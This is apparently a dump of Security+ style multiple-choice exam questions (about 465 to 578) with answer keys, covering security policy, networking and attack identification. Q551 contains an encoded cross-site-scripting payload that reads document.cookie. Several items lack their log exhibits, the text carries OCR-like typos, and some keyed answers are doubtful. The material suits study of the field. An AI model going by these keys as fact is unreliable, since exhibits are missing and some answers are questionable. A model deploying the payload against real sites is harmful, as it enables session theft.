Which of the following documents specifies what to do in the event of catastrophic loss of a physical or virtual system?
A. Data retention plan
B. Incident response plan
C. Disaster recovery plan
D. Communication plan
Correct Answer: C

Question #466
Which of the following rales is responsible for defining the protection type and classification type for a given set of files?
A. General counsel
B. Data owner
C. Risk manager
D. Chief Information Officer
Correct Answer: B

Question #467
An employee's company email is configured with conditional access and requires that MFA is enabled and used. An example of MFA is a phone
call and:
A. a push notification
B. a password
C. an SMS message
D. an authentication application
Correct Answer: B

Question #468
Which of the following is a security implication of newer ICS devices that are becoming more common in corporations?
A. Devices with cellular communication capabilities bypass traditional network security controls
B. Many devices do not support elliptic-curve encryption algorithms due to the overhead they require
C. These devices often lack privacy controls and do not meet newer compliance regulations
D. Unauthorized voice and audio recording can cause loss of intellectual property
Correct Answer: A

Question #469
Which of the following is required in order for an IDS and a WAF to be effective on HTTPS traffic?
A. Hashing
B. DNS sinkhole
C. TLS inspection
D. Data masking
Correct Answer: C

Question #470
A company policy requires third-party suppliers to self-report data breaches within a specific time frame. Which of the following third-party risk
management policies is the company complying with?
A. MOU
B. SLA
C. EOL
D. NDA
Correct Answer: B

Question #471
While troubleshooting service disruption on a mission-critical server, a technician discovered the user account that was configured to run
automated processes was disabled because the user s password failed to meet password complexity requirements. Which of the following would
be the best solution to securely prevent future issues?
A. Using an administrator account to run the processes and disabling the account when it is not in use
B. Implementing a shared account the team can use to run automated processes
C. Configuring a service account to run the processes
D. Removing the password complexity requirements for the user account
Correct Answer: C

Question #472
A security analyst is assessing a new y developed web application by testing SQL injection, CSRF, and XML injection. Which of the follow ng
frameworks should the analyst consider?
A. ISO
B. MITRE ATT&CK
C. OWASP
D. NIST
Correct Answer: C

Question #473
A user s laptop constantly disconnects from the Wi-Fi network. Once the laptop reconnects, the user can reach the internet but cannot access
shared folders or other network resources. Which of the following types of attacks is the user most likely experiencing?
A. Bluejacking
B. Jamming
C. Rogue access point
D. Evil twin
Correct Answer: D

Question #474
Which of the following procedures would be performed after the root cause of a security incident has been identified to help avoid future incidents
from occurring?
A. Walk-throughs
B. Lessons learned
C. Attack framework alignment
D. Containment
Correct Answer: B

Question #475
A security administrator is integrating several segments onto a single network. One of the segments, which includes legacy devices, presents a
significant amount of risk to the network. Which of the follow ng would allow users to access to the legacy devices without compromising the
security of the entire network?
A. NIDS
B. MAC filtering
C. Jump server
D. IPSec
E. NAT gateway
Correct Answer: C

Question #476
Which of the following would a security analyst use to determine if other companies in the same sector have seen similar malicious activity
against their systems?
A. Vulnerability scanner
B. Open-source intelligence
C. Packet capture
D. Threat feeds
Correct Answer: D

Question #477
Which of the following types of disaster recovery plan exercises requires the least interruption to IT operations?
A. Parallel
B. Full-scale
C. Tabletop
D. Simulation
Correct Answer: C

Question #478
Which of the follow ng disaster recovery sites is the most cost effective to operate?
A. Warm site
B. Cold site
C. Hot site
D. Hybrid site
Correct Answer: B

Question #479
A security operations center wants to implement a solution that can execute files to test for malicious activity. The solution should provide a
report of the files' activity against known threats. Which of the following should the security operations center implement?
A. the Harvester
B. Nessus
C. Cuckoo
D. Sn1per
Correct Answer: C

Question #480
A security administrator would like to ensure all cloud servers will have software preinstalled for facilitating vulnerability scanning and continuous
monitoring. Which of the following concepts should the administrator utilize?
A. Provisioning
B. Staging
C. Staging
D. Quality assurance
Correct Answer: A

Question #481
A network architect wants a server to have the ability to retain network availability even if one of the network switches it is connected to goes
down. Which of the following should the architect implement on the server to achieve this goal?
A. RAID
B. UPS
C. NIC teaming
D. Load balancing
Correct Answer: C

Question #482
An employee received multiple messages on a mobile device. The messages were instructing the employee to pair the device to an unknown
device. Which of the follow ng best describes what a malicious person might be doing to cause this issue to occur?
A. Jamming
B. Bluesnarfing
C. Evil twin attack
D. Rogue access point
Correct Answer: B

Question #483
A security administrator installed a new web server. The administrator did this to increase the capacity for an application due to resource
exhaustion on another server. Which of the following algorithms should the administrator use to split the number of the connections on each
server in half?
A. Weighted response
B. Round-robin
C. Least connection
D. Weighted least connection
Correct Answer: B

Question #484
Security analysts have noticed the network becomes flooded with malicious packets at specific times of the day. Which of the following should
the analysts use to investigate this issue?
A. Web metadata
B. Bandwidth monitors
C. System files
D. Correlation dashboards
Correct Answer: B

Question #485
A security administrator performs weekly vulnerability scans on all cloud assets and provides a detailed report. Which of the following describes
the administrator’s activities?
A. Continuous deployment
B. Continuous integration
C. Data owners
D. Data processor
Correct Answer: D

Question #486
An attacker is targeting a company. The attacker notices that the company's employees frequently access a particular website. The attacker
decides to infect the website with malware and hopes the employees' devices will also become infected. Which of the follow ng techniques is the
attacker using?
A. Watering-hole attack
B. Pretexting
C. Typosquatting
D. Impersonation
Correct Answer: A

Question #487
A digital forensics team at a large company is investigat ng a case in which malicious code was down oaded over an HTTPS connection and was
running in memory, but was never committed to disk. Which of the following techniques should the team use to obtain a sample of the malware
binary?
A. pcap reassembly
B. SSD snapshot
C. Image volatile memory
D. Extract from checksums
Correct Answer: C

Question #488
A website visitor is required to provide properly formatted information in a specific field on a website form. Which of the following security
measures is most likely used for this mandate?
A. Input validation
B. Code signing
C. SQL injection
D. Form submission
Correct Answer: A

Question #489
A technician is setting up a new firewall on a network segment to allow web traffic to the internet while hardening the network. After the firewall is
configured, users receive errors stating the website could not be located. Which of the following would best correct the issue?
A. Setting an explicit deny to all traffic using port 80 instead of 443
B. Moving the implicit deny from the bottom of the rule set to the top
C. Configuring the first line in the rule set to allow all traffic
D. Ensuring that port 53 has been explicitly allowed in the rule set
Correct Answer: D

Question #490
A systems administrator works for a local hospital and needs to ensure patient data is protected and secure. Which of the following data
classifications should be used to secure patient data?
A. Private
B. Critical
C. Sensitive
D. Public
Correct Answer: C

Question #491
A small business uses kiosks on the sales floor to display product information for customers. A security team discovers the kiosks use end-of-life
operating systems. Which of the following is the security team most likely to document as a security implication of the current architecture?
A. Patch availability
B. Product software compatibility
C. Ease of recovery
D. Cost of replacement
Correct Answer: A

Question #492
During a security incident, the security operations team identified sustained network traffic from a malicious IP address: 10.1.4.9. A security
analyst is creating an inbound firewall rule to block the IP address from accessing the organization's network. Which of the following fulfills this
request?
A. access-list inbound deny ip source 0.0.0.0/0 destination 10.1.4.9/32
B. access-list inbound deny ip source 10.1.4.9/32 destination 0.0.0.0/0
C. access-list inbound permit ip source 10.1.4.9/32 destination 0.0.0.0/0
D. access-list inbound permit ip source 0.0.0.0/0 destination 10.1.4.9/32
Correct Answer: B

Question #493
Which of the following is the phase in the incident response process when a security analyst reviews roles and responsibilities?
A. Preparation
B. Recovery
C. Lessons learned
D. Analysis
Correct Answer: A

Question #494
An administrator is reviewing a single server's security logs and discovers the following:
Which of the following best describes the action captured in this log file?
A. Brute-force attack
B. Privilege escalation
C. Failed password audit
D. Forgotten password by the user
Correct Answer: A

Question #495
Which of the following can be used to identify potential attacker activities without affecting production servers?
A. Honeypot
B. Video surveillance
C. Zero trust
D. Geofencing
Correct Answer: A

Question #496
A company wants the ability to restrict web access and monitor the websites that employees visit. Which of the following would best meet these
requirements?
A. Internet proxy
B. VPN
C. WAF
D. Firewall
Correct Answer: A

Question #497
A security analyst notices an unusual amount of traffic hitting the edge of the network. Upon examining the logs, the analyst identifies a source IP
address and blocks that address from communicating with the network. Even though the analyst is blocking this address, the attack is still
ongoing and coming from a large number of different source IP addresses. Which of the following describes this type of attack?
A. DDoS
B. Privilege escalation
C. DNS poisoning
D. Buffer overflow
Correct Answer: A

Question #498
A company needs to centralize its logs to create a baseline and have visibility on its security events. Which of the following technologies will
accomplish this objective?
A. Security information and event management
B. A web application firewall
C. A vulnerability scanner
D. A next-generation firewall
Correct Answer: A

Question #499
Two organizations are discussing a possible merger. Both organizations' Chief Financial Officers would like to safely share payroll data with each
other to determine if the pay scales for different roles are similar at both organizations. Which of the following techniques would be best to
protect employee data while allowing the companies to successfully share this information?
A. Pseudo-anonymization
B. Tokenization
C. Data masking
D. Encryption
Correct Answer: A

Question #500
A large retail store's network was breached recently, and this news was made public. The store did not lose any intellectual property, and no
customer information was stolen. Although no fines were incurred as a result, the store lost revenue after the breach. Which of the following is the
most likely reason for this issue?
A. Employee training
B. Leadership changes
C. Reputation damage
D. Identity theft
Correct Answer: C

Question #501
A government organization is developing an advanced Al defense system. Developers are using information collected from third-party providers.
Analysts are noticing inconsistencies in the expected progress of the Al learning and attribute the outcome to a recent attack on one of the
suppliers. Which of the following is the most likely reason for the inaccuracy of the system?
A. Improper algorithms security
B. Tainted training data
C. Fileless virus
D. Cryptomalware
Correct Answer: B

Question #502
A company's help desk has received calls about the wireless network being down and users being unable to connect to it. The network
administrator says all access points are up and running. One of the help desk technicians notices the affected users are working in a building near
the parking lot. Which of the following is the most likely reason for the outage?
A. Someone near the building is jamming the signal.
B. A user has set up a rogue access point near the building.
C. Someone set up an evil twin access point in the affected area.
D. The APs in the affected area have been unplugged from the network.
Correct Answer: A

Question #503
Which of the following can best protect against an employee inadvertently installing malware on a company system?
A. Host-based firewall
B. System isolation
C. Least privilege
D. Application allow list
Correct Answer: D

Question #504
An information security officer at a credit card transaction company is conducting a framework-mapping exercise with the internal controls. The
company recently established a new office in Europe. To which of the following frameworks should the security officer map the existing controls?
(Choose two.)
A. ISO
B. PCIDSS
C. SOC
D. GDPR
E. CSA
F. NIST
Correct Answer: BD

Question #505
A customer called a company's security team to report that all invoices the customer has received over the last five days from the company
appear to have fraudulent banking details. An investigation into the matter reveals the following:
• The manager of the accounts payable department is using the same password across multiple external websites and the corporate account.
• One of the websites the manager used recently experienced a data breach.
• The manager's corporate email account was successfully accessed in the last five days by an IP address located in a foreign country.
Which of the following attacks has most likely been used to compromise the manager's corporate account?
A. Remote access Trojan
B. Brute-force
C. Dictionary
D. Credential stuffing
E. Password spraying
Correct Answer: D

Question #506
An organization's corporate offices were destroyed due to a natural disaster, so the organization is now setting up offices in a temporary work
space. Which of the following will the organization most likely consult?
A. The business continuity plan
B. The risk management plan
C. The communication plan
D. The incident response plan
Correct Answer: A

Question #507
Security analysts notice a server login from a user who has been on vacation for two weeks. The analysts confirm that the user did not log in to
the system while on vacation. After reviewing packet capture logs, the analysts notice the following:
Which of the following occurred?
A. A buffer overflow was exploited to gain unauthorized access.
B. The user’s account was compromised, and an attacker changed the login credentials.
C. An attacker used a pass-the-hash attack to gain access.
D. An insider threat with username smithJA logged in to the account.
Correct Answer: C

Question #508
A security analyst is taking part in an evaluation process that analyzes and categorizes threat actors of real-world events in order to improve the
incident response team's process. Which of the following is the analyst most likely participating in?
A. MITRE ATT&CK
B. Walk-through
C. Red team
D. Purple team
E. TAXII
Correct Answer: D

Question #509
A network manager wants to protect the company's VPN by multifactor authentication that uses:
• Something you know
• Something you have
• Somewhere you are
Which of the following would accomplish the manager's goal?
A. Domain name. PKI, GeoIP lookup
B. VPN IP address, company ID. partner site
C. Password, authentication token, thumbprint
D. Company URL, TLS certificate, home address
Correct Answer: C

Question #510
Which of the following terms should be included in a contract to help a company monitor the ongoing security maturity of a new vendor?
A. A right-to-audit clause allowing for annual security audits
B. Requirements for event logs to be kept for a minimum of 30 days
C. Integration of threat intelligence in the company's AV
D. A data-breach clause requiring disclosure of significant data loss
Correct Answer: A

Question #511
Which of the following cloud models provides clients with servers, storage, and networks but nothing else?
A. SaaS
B. PaaS
C. IaaS
D. DaaS
Correct Answer: C

Question #512
A marketing coordinator is trying to access a social media application on a company laptop but is getting blocked. The coordinator opens a help
desk ticket to report the issue. Which of the following documents should a security analyst review to determine whether accessing social media
applications on a company device is permitted?
A. Incident response policy
B. Business continuity policy
C. Change management policy
D. Acceptable use policy
Correct Answer: D

Question #513
Law enforcement officials sent a company a notification that states electronically stored information and paper documents cannot be destroyed.
Which of the following explains this process?
A. Data breach notification
B. Accountability
C. Legal hold
D. Chain of custody
Correct Answer: C

Question #514
A company wants to deploy decoy systems alongside production systems in order to entice threat actors and to learn more about attackers.
Which of the following best describes these systems?
A. DNS sinkholes
B. Honeypots
C. Virtual machines
D. Neural networks
Correct Answer: B

Question #515
A company's help desk received several AV alerts indicating Mimikatz attempted to run on the remote systems. Several users also reported that
the new company flash drives they picked up in the break room only have 512KB of storage. Which of the following is most likely the cause?
A. The GPO prevents the use of flash drives, which triggers a false positive AV indication and restricts the drives to only 512KB of storage.
B. The new flash drives need a driver that is being blocked by the AV software because the flash drives are not on the application's allow list,
temporarily restricting the drives to 512KB of storage.
C. The new flash drives are incorrectly partitioned, and the systems are automatically trying to use an unapproved application to repartition
the drives.
D. The GPO blocking the flash drives is being bypassed by a malicious flash drive that is attempting to harvest plaintext credentials from
memory.
Correct Answer: D

Question #516
A company has installed badge readers for building access but is finding unauthorized individuals roaming the hallways. Which of the following is
the most likely cause?
A. Shoulder surfing
B. Phishing
C. Tailgating
D. Identity fraud
Correct Answer: C

Question #517
An organization routes all of its traffic through a VPN. Most users are remote and connect into a corporate data center that houses confidential
information. There is a firewall at the internet border, followed by a DLP appliance, the VPN server, and the data center itself. Which of the
following is the weakest design element?
A. The DLP appliance should be integrated into a NGFW.
B. Split-tunnel connections can negatively impact the DLP appliance's performance.
C. Encrypted VPN traffic will not be inspected when entering or leaving the network.
D. Adding two hops in the VPN tunnel may slow down remote connections.
Correct Answer: C

Question #518
Which of the following is the best method for ensuring non-repudiation?
A. SSO
B. Digital certificate
C. Token
D. SSH key
Correct Answer: B

Question #519
Which of the following methods is the most effective for reducing vulnerabilities?
A. Joining an information-sharing organization
B. Using a scan-patch-scan process
C. Implementing a bug bounty program
D. Patching low-scoring vulnerabilities first
Correct Answer: B

Question #520
An organization is struggling with scaling issues on its VPN concentrator and internet circuit due to remote work. The organization is looking for a
software solution that will allow it to reduce traffic on the VPN and internet circuit, while still providing encrypted tunnel access to the data center
and monitoring of remote employee internet traffic. Which of the following will help achieve these objectives?
A. Deploying a SASE solution to remote employees
B. Building a load-balanced VPN solution with redundant internet
C. Purchasing a low-cost SD-WAN solution for VPN traffic
D. Using a cloud provider to create additional VPN concentrators
Correct Answer: A

Question #521
Which of the following is the best reason to complete an audit in a banking environment?
A. Regulatory requirement
B. Organizational change
C. Self-assessment requirement
D. Service-level requirement
Correct Answer: A

Question #522
After a recent ransomware attack on a company's system, an administrator reviewed the log files. Which of the following control types did the
administrator use?
A. Compensating
B. Detective
C. Preventive
D. Corrective
Correct Answer: B

Question #523
A technician needs to apply a high-priority patch to a production system. Which of the following steps should be taken first?
A. Air gap the system.
B. Move the system to a different network segment.
C. Create a change control request.
D. Apply the patch to the system.
Correct Answer: C

Question #524
A security analyst reports a company policy violation in a case in which a large amount of sensitive data is being downloaded after hours from
various mobile devices to an external site. Upon further investigation, the analyst notices that successful login attempts are being conducted with
impossible travel times during the same time periods when the unauthorized downloads are occurring. The analyst also discovers a couple of
WAPs are using the same SSID, but they have non-standard DHCP configurations and an overlapping channel. Which of the following attacks is
being conducted?
A. Evil twin
B. Jamming
C. DNS poisoning
D. Bluesnarfing
E. DDoS
Correct Answer: A

Question #525
Several users have opened tickets with the help desk. The help desk has reassigned the tickets to a security analyst for further review. The
security analyst reviews the following metrics:
Which of the following is most likely the result of the security analyst's review?
A. The ISP is dropping outbound connections.
B. The user of the Sales-PC fell for a phishing attack
C. Corporate PCs have been turned into a botnet.
D. An on-path attack is taking place between PCs and the router.
Correct Answer: C

Question #526
An engineer needs to deploy a security measure to identify and prevent data tampering within the enterprise. Which of the following will
accomplish this goal?
A. Antivirus
B. IPS
C. FTP
D. FIM
Correct Answer: D

Question #527
Which of the following mitigation techniques places devices in physically or logically separated networks and leverages policies to limit the types
of communications that are allowed?
A. Host-based firewalls
B. Access control list
C. Port security
D. Least privilege
Correct Answer: B

Question #528
All security analysts' workstations at a company have network access to a critical server VLAN. The information security manager wants to
further enhance the controls by requiring that all access to the secure VLAN be authorized only from a given single location. Which of the
following will the information security manager most likely implement?
A. A forward proxy server
B. A jump server
C. A reverse proxy server
D. A stateful firewall server
Correct Answer: B

Question #529
Which of the following best describes why a company would erase a newly purchased device and install its own image with an operating system
and applications?
A. Installing a new operating system thoroughly tests the equipment
B. Removing unneeded applications reduces the system's attack surface
C. Reimaging a system creates an updated baseline of the computer image
D. Wiping the device allows the company to evaluate its performance
Correct Answer: B

Question #530
A backdoor was detected on the containerized application environment. The investigation detected that a zero-day vulnerability was introduced
when the latest container image version was downloaded from a public registry. Which of the following is the best solution to prevent this type of
incident from occurring again?
A. Enforce the use of a controlled trusted source of container images.
B. Deploy an IPS solution capable of detecting signatures of attacks targeting containers.
C. Define a vulnerability scan to assess container images before being introduced on the environment.
D. Create a dedicated VPC for the containerized environment.
Correct Answer: A

Question #531
An external forensics investigator has been hired to investigate a data breach at a large enterprise with numerous assets. It is known that the
breach started in the perimeter network and moved to the sensitive information, generating multiple logs as the attacker traversed through the
network. Which of the following will best assist with this investigation?
A. Perform a vulnerability scan to identify the weak spots.
B. Use a packet analyzer to investigate the NetFlow traffic.
C. Check the SIEM to review the correlated logs.
D. Require access to the routers to view current sessions.
Correct Answer: C

Question #532
A Chief Information Security Officer (CISO) needs to create a policy set that meets international standards for data privacy and sharing. Which of
the following should the CISO read and understand before writing the policies?
A. PCI DSS
B. GDPR
C. NIST
D. ISO 31000
Correct Answer: B

Question #533
During an internal penetration test, a security analyst identified a network device that had accepted cleartext authentication and was configured
with a default credential. Which of the following recommendations should the security analyst make to secure this device?
A. Configure SNMPv1.
B. Configure SNMPv2c.
C. Configure SNMPv3.
D. Configure the default community string.
Correct Answer: C

Question #534
Developers are writing code and merging it into shared repositories several times a day, where it is tested automatically. Which of the following
concepts does this best represent?
A. Functional testing
B. Stored procedures
C. Elasticity
D. Continuous integration
Correct Answer: D

Question #535
A large financial services firm recently released information regarding a security breach within its corporate network that began several years
before. During the time frame in which the breach occurred, indicators show an attacker gained administrative access to the network through a file
downloaded from a social media site and subsequently installed it without the user's knowledge. Since the compromise, the attacker was able to
take command and control of the computer systems anonymously while obtaining sensitive corporate and personal employee information. Which
of the following methods did the attacker most likely use to gain access?
A. A bot
B. A fileless virus
C. A logic bomb
D. A RAT
Correct Answer: D

Question #536
Recent changes to a company's BYOD policy require all personal mobile devices to use a two-factor authentication method that is not something
you know or have. Which of the following will meet this requirement?
A. Facial recognition
B. Six-digit PIN
C. PKI certificate
D. Smart card
Correct Answer: A

Question #537
A critical file server is being upgraded, and the systems administrator must determine which RAID level the new server will need to achieve parity
and handle two simultaneous disk failures. Which of the following RAID levels meets this requirement?
A. RAID 0+1
B. RAID 2
C. RAID 5
D. RAID 6
Correct Answer: D

Question #538
A company must ensure sensitive data at rest is rendered unreadable. Which of the following will the company most likely use?
A. Hashing
B. Tokenization
C. Encryption
D. Segmentation
Correct Answer: C

Question #539
A security assessment found that several embedded systems are running unsecure protocols. These systems were purchased two years ago, and
the company that developed them is no longer in business. Which of the following constraints best describes the reason the findings cannot be
remediated?
A. Inability to authenticate
B. Implied trust
C. Lack of computing power
D. Unavailable patch
Correct Answer: D

Question #540
A security engineer is concerned about using an agent on devices that relies completely on defined known-bad signatures. The security engineer
wants to implement a tool with multiple components including the ability to track, analyze, and monitor devices without reliance on definitions
alone. Which of the following solutions best fits this use case?
A. EDR
B. DLP
C. NGFW
D. HIPS
Correct Answer: A

Question #541
A user's login credentials were recently compromised. During the investigation, the security analyst determined the user input credentials into a
pop-up window when prompted to confirm the username and password. However, the trusted website does not use a pop-up for entering user
credentials. Which of the following attacks occurred?
A. Cross-site scripting
B. SQL injection
C. DNS poisoning
D. Certificate forgery
Correct Answer: A

Question #542
To reduce costs and overhead, an organization wants to move from an on-premises email solution to a cloud-based email solution. At this time,
no other services will be moving. Which of the following cloud models would best meet the needs of the organization?
A. MaaS
B. IaaS
C. SaaS
D. PaaS
Correct Answer: C

Question #543
A software development manager wants to ensure the authenticity of the code created by the company. Which of the following options is the most
appropriate?
A. Testing input validation on the user input fields
B. Performing code signing on company-developed software
C. Performing static code analysis on the software
D. Ensuring secure cookies are used
Correct Answer: B

Question #544
An organization is having difficulty correlating events from its individual AV, EDR, DLP
, SWG, WAF, MDM, HIPS, and CASB systems. Which of the
following is the best way to improve the situation?
A. Remove expensive systems that generate few alerts.
B. Modify the systems to alert only on critical issues.
C. Utilize a SIEM to centralize logs and dashboards.
D. Implement a new syslog/NetFlow appliance.
Correct Answer: C

Question #545
A company's end users are reporting that they are unable to reach external websites. After reviewing the performance data for the DNS severs, the
analyst discovers that the CPU, disk, and memory usage are minimal, but the network interface is flooded with inbound traffic. Network logs show
only a small number of DNS queries sent to this server. Which of the following best describes what the security analyst is seeing?
A. Concurrent session usage
B. Secure DNS cryptographic downgrade
C. On-path resource consumption
D. Reflected denial of service
Correct Answer: D

Question #546
An audit identified PII being utilized in the development environment of a critical application. The Chief Privacy Officer (CPO) is adamant that this
data must be removed; however, the developers are concerned that without real data they cannot perform functionality tests and search for
specific data. Which of the following should a security professional implement to best satisfy both the CPO's and the development team's
requirements?
A. Data purge
B. Data encryption
C. Data masking
D. Data tokenization
Correct Answer: C

Question #547
A security analyst is investigating a malware incident at a company. The malware is accessing a command-and-control website at
www.comptia.com. All outbound Internet traffic is logged to a syslog server and stored in /logfiles/messages. Which of the following commands
would be best for the analyst to use on the syslog server to search for recent traffic to the command-and-control website?
A. head -500 www.comptia.com | grep /logfiles/messages
B. cat /logfiles/messages | tail -500 www.comptia.com
C. tail -500 /logfiles/messages | grep www.comptia.com
D. grep -500 /logfiles/messages | cat www.comptia.com
Correct Answer: C

Question #548
A systems administrator set up an automated process that checks for vulnerabilities across the entire environment every morning. Which of the
following activities is the systems administrator conducting?
A. Scanning
B. Alerting
C. Reporting
D. Archiving
Correct Answer: A

Question #549
An engineer is setting up a VDI environment for a factory location, and the business wants to deploy a low-cost solution to enable users on the
shop floor to log in to the VDI environment directly. Which of the following should the engineer select to meet these requirements?
A. Laptops
B. Containers
C. Thin clients
D. Workstations
Correct Answer: C

Question #550
A systems administrator receives the following alert from a file integrity monitoring tool:
The hash of the cmd.exe file has changed.
The systems administrator checks the OS logs and notices that no patches were applied in the last two months. Which of the following most likely
occurred?
A. The end user changed the file permissions.
B. A cryptographic collision was detected.
C. A snapshot of the file system was taken.
D. A rootkit was deployed.
Correct Answer: D

Question #551
A security analyst was asked to evaluate a potential attack that occurred on a publicly accessible section of the company's website. The
malicious actor posted an entry in an attempt to trick users into clicking the following:
https://www.c0mpt1a.com/contact-us/%3Fname%3D%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E
Which of the following was most likely observed?
A. DLL injection
B. Session replay
C. SQLi
D. XSS
Correct Answer: D

Question #552
A company's Chief Information Security Officer (CISO) recently warned the security manager that the company's Chief Executive Officer (CEO) is
planning to publish a controversial opinion article in a national newspaper, which may result in new cyberattacks. Which of the following would be
best for the security manager to use in a threat model?
A. Hacktivists
B. White-hat hackers
C. Script kiddies
D. Insider threats
Correct Answer: A

Question #553
Which of the following provides a catalog of security and privacy controls related to the United States federal information systems?
A. GDPR
B. PCI DSS
C. ISO 27000
D. NIST 800-53
Correct Answer: D

Question #554
An analyst is concerned about data leaks and wants to restrict access to internet services to authorized users only. The analyst also wants to
control the actions each user can perform on each service. Which of the following would be the best technology for the analyst to consider
Implementing?
A. DLP
B. VPC
C. CASB
D. Content filtering
Correct Answer: C

Question #555
A grocery store is expressing security and reliability concerns regarding the on-site backup strategy currently being performed by locally attached
disks. The main concerns are the physical security of the backup media and the durability of the data stored on these devices. Which of the
following is a cost-effective approach to address these concerns?
A. Enhance resiliency by adding a hardware RAID.
B. Move data to a tape library and store the tapes off-site.
C. Install a local network-attached storage.
D. Migrate to a cloud backup solution.
Correct Answer: D

Question #556
A security engineer needs to recommend a solution to defend against malicious actors misusing protocols and being allowed through network
defenses. Which of the following will the engineer most likely recommend?
A. A content filter
B. A WAF
C. A next-generation firewall
D. An IDS
Correct Answer: C

Question #557
A company's legal department drafted sensitive documents in a SaaS application and wants to ensure the documents cannot be accessed by
individuals in high-risk countries. Which of the following is the most effective way to limit this access?
A. Data masking
B. Encryption
C. Geolocation policy
D. Data sovereignty regulation
Correct Answer: C

Question #558
An organization suffered numerous multiday power outages at its current location. The Chief Executive Officer wants to create a disaster recovery
strategy to resolve this issue. Which of the following options offer low-cost solutions? (Choose two.)
A. Warm site
B. Generator
C. Hot site
D. Cold site
E. Cloud backups
F. UPS
Correct Answer: BF

Question #559
A security analyst is reviewing the following logs:
Which of the following attacks is most likely occurring?
A. Password spraying
B. Account forgery
C. Pass-the-hash
D. Brute-force
Correct Answer: A

Question #560
A security analyst discovers that one of the web APIs is being abused by an unknown third party. Logs indicate that the third party is attempting to
manipulate the parameters being passed to the API endpoint. Which of the following solutions would best help to protect against the attack?
A. DLP
B. SIEM
C. NIDS
D. WAF
Correct Answer: D

Question #561
An application owner reports suspicious activity on an internal financial application from various internal users within the past 14 days. A security
analyst notices the following:
• Financial transactions were occurring during irregular time frames and outside of business hours by unauthorized users.
• Internal users in question were changing their passwords frequently during that time period.
• A jump box that several domain administrator users use to connect to remote devices was recently compromised.
• The authentication method used in the environment is NTLM.
Which of the following types of attacks is most likely being used to gain unauthorized access?
A. Pass-the-hash
B. Brute-force
C. Directory traversal
D. Replay
Correct Answer: A

Question #562
During an incident, an EDR system detects an increase in the number of encrypted outbound connections from multiple hosts. A firewall is also
reporting an increase in outbound connections that use random high ports. An analyst plans to review the correlated logs to find the source of the
incident. Which of the following tools will best assist the analyst?
A. A vulnerability scanner
B. A NGFW
C. The Windows Event Viewer
D. A SIEM
Correct Answer: D

Question #563
A company recently suffered a breach in which an attacker was able to access the internal mail servers and directly access several user inboxes.
A large number of email messages were later posted online. Which of the following would best prevent email contents from being released should
another breach occur?
A. Implement S/MIME to encrypt the emails at rest.
B. Enable full disk encryption on the mail servers.
C. Use digital certificates when accessing email via the web.
D. Configure web traffic to only use TLS-enabled channels.
Correct Answer: A

Question #564
A company hired a consultant to perform an offensive security assessment covering penetration testing and social engineering. Which of the
following teams will conduct this assessment activity?
A. White
B. Purple
C. Blue
D. Red
Correct Answer: D

Question #565
Which of the following exercises should an organization use to improve its incident response process?
A. Tabletop
B. Replication
C. Failover
D. Recovery
Correct Answer: A

Question #566
An attacker is attempting to harvest user credentials on a client's website. A security analyst notices multiple attempts of random usernames and
passwords. When the analyst types in a random username and password, the logon screen displays the following message:
The username you entered does not exist.
Which of the following should the analyst recommend be enabled?
A. Input valuation
B. Obfuscation
C. Error handling
D. Username lockout
Correct Answer: C

Question #567
An organization disabled unneeded services and placed a firewall in front of a business-critical legacy system. Which of the following best
describes the actions taken by the organization?
A. Exception
B. Segmentation
C. Risk transfer
D. Compensating controls
Correct Answer: D

Question #568
Which of the following describes the ability of code to target a hypervisor from inside a guest OS?
A. Fog computing
B. VM escape
C. Software-defined networking
D. Image forgery
E. Container breakout
Correct Answer: B

Question #569
A local server recently crashed and the team is attempting to restore the server from a backup. During the restore process, the team notices the
file size of each daily backup is large and will run out of space at the current rate. The current solution appears to do a full backup every night.
Which of the following would use the least amount of storage space for backups?
A. A weekly, incremental backup with daily differential backups
B. A weekly, full backup with daily snapshot backups
C. A weekly, full backup with daily differential backups
D. A weekly, full backup with daily incremental backups
Correct Answer: D

Question #570
A security analyst discovers several jpg photos from a cellular phone during a forensics investigation involving a compromised system. The
analyst runs a forensics tool to gather file metadata. Which of the following would be part of the images if all the metadata is still intact?
A. The GPS location
B. When the file was deleted
C. The total number of print jobs
D. The number of copies made
Correct Answer: A

Question #571
A financial analyst is expecting an email containing sensitive information from a client. When the email arrives the analyst receives an error and is
unable to open the encrypted message. Which of the following is the most likely cause of the issue?
A. The S/MIME plug-in is not enabled
B. The SSL certificate has expired
C. Secure IMAP was not implemented
D. POP3S is not supported
Correct Answer: A

Question #572
A company develops a complex platform that is composed of a single application. After several issues with upgrades, the systems administrator
recommends breaking down the application into unique, independent modules. Which of the following best identifies the systems administrator's
recommendation?
A. Virtualization
B. Serverless
C. Microservices
D. API gateway
Correct Answer: C

Question #573
Which of the following would be the best way to block unknown programs from executing?
A. Access control list
B. Application allow list
C. Host-based firewall
D. DLP solution
Correct Answer: B

Question #574
A company is planning to install a guest wireless network so visitors will be able to access the internet. The stakeholders want the network to be
easy to connect to so time is not wasted during meetings. The WAPs are configured so that power levels and antennas cover only the conference
rooms where visitors will attend meetings. Which of the following would best protect the company's internal wireless network against visitors
accessing company resources?
A. Configure the guest wireless network to be on a separate VLAN from the company’s internal wireless network.
B. Change the password for the guest wireless network every month.
C. Decrease the power levels of the access points for the guest wireless network.
D. Enable WPA2 using 802.1X for logging on to the guest wireless network.
Correct Answer: A

Question #575
An organization relies on third-party videoconferencing to conduct daily business. Recent security changes now require all remote workers to
utilize a VPN to corporate resources. Which of the following would best maintain high-quality videoconferencing while minimizing latency when
connected to the VPN?
A. Using geographic diversity to have VPN terminators closer to end users
B. Utilizing split tunneling so only traffic for corporate resources is encrypted
C. Purchasing higher bandwidth connections to meet the increased demand
D. Configuring QoS properly on the VPN accelerators
Correct Answer: D

Question #576
A security analyst is scanning a company's public network and discovers a host is running a remote desktop that can be used to access the
production network. Which of the following changes should the security analyst recommend?
A. Changing the remote desktop port to a non-standard number
B. Setting up a VPN and placing the jump server inside the firewall
C. Using a proxy for web connections from the remote desktop server
D. Connecting the remote server to the domain and increasing the password length
Correct Answer: B

Question #577
A company recently experienced a major breach. An investigation concludes that customer credit card data was stolen and exfiltrated through a
dedicated business partner connection to a vendor, who is not held to the same security control standards. Which of the following is the most
likely source of the breach?
A. Side channel
B. Supply chain
C. Cryptographic downgrade
D. Malware
Correct Answer: B

Question #578
A company would like to provide flexibility for employees on device preference. However, the company is concerned about supporting too many
different types of hardware. Which of the following deployment models will provide the needed flexibility with the greatest amount of control and
security over company data and infrastructure?
A. BYOD
B. VDI
C. COPE
D. CYOD
Correct Answer: D

Question #579
